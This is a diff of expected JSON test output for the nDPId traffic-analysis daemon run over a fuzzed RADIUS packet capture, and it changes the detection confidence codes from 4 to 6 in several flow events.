+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1528998576080,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998576080,"pkt":"AAAMB6xuABRP+4rqCABFAALbIWRAAP8RAAAKDEAexuIZNXIQBxQCxwAAAbYCvyTqgpE\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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998576181,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1528998576181,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998576181,"pkt":"ABRP+4rqcNuYVcUnCABFAAClD7RAAPsRRVLG4hk1CgxAHgcWchAAkUUeC7YAjbHF+KxzM1jmiRGRdJnwnSQBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzTw4BAAAMFwwAAAwBf\/xQEmpMlHIe9v0pkoCIcMRZLH4="} 
01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1528998576307,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998576307,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIWVAAP8RAAAKDEAexuIZNXIQBxQClwAAAbcCj0ICRJPAa6Qqmxpo\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"} 
@@ -449,17 +449,17 @@ 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1528998584808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998584808,"pkt":"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"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1528998585019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998585019,"pkt":"ABRP+4rqcNuYVcUnCABFAADhD9lAAPwRdvHG4hk1CgxAHgcUWBAAzQh\/C7gAxWTiZLZdO+cme7xhCKfM6MYBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6d2Q6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAADyCxcI7XkaT0UFvUk8tJ2YAgUAAMJakSoc8QAAT38LtnrvLnGLAQACCwUAADQNzAWg+MfiRgxSS6PGeYdQEs5faleq8GPWzRgEVPv2RUo="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1528998585268,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998585268,"pkt":"AAAMB6xAABRP+4rqCABFAALHIWdAAP8RAAAKDEAexuIZNXIQBxQCswAAAbkCqwwIsTK62hmv9RZW9\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"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998585453} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998585268,"pkt":"ABRP+4rqcNuYVcUnCABFADUwD91AAPwRQ57G4hk1CgxAHgcUchABHJkzArkBFPuMuhZj3jbkVosdPxLeAO4aCwAAV8gbBVNQQxpuAAABNxA0w9JZoXWsZGeHUoYiJ9p40yJPEfSCC1VPuzQcz\/tcT9Zniiv93vAfl8Sqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00579{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":349,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":349,"packets-processed":285,"total-skipped-flows":0,"total-l4-payload-len":123530,"total-not-detected-flows":15,"total-guessed-flows":3,"total-detected-flows":55,"total-detection-updates":0,"total-updates":13,"current-active-flows":6,"total-active-flows":76,"total-idle-flows":70,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":456,"global_ts_msec":1528998601376} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1528998605741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"thread_ts_msec":1528998605741,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1528998605816,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528998605816,"pkt":"ABRP+4rqcNuYVcUnCABFAACF321AAPwRdKvG4hk1CgxAHgcVUhAAcX0pBbwAafRaWCO5QhnkLZA61WpkFeUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBZZXR3b3JrLm9yZywgNWIyMmFhYzkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjQ0"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":355,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1528997663992,"flow_last_seen":1528997989461,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":355,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1528997663992,"flow_last_seen":1528997989461,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":620000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998636010,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 
@@ -468,15 +468,15 @@ 01218{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2064,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998636010,"pkt":"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"} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":22528,"global_ts_msec":1528998639586} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":22528,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998639447,"pkt":"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"} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
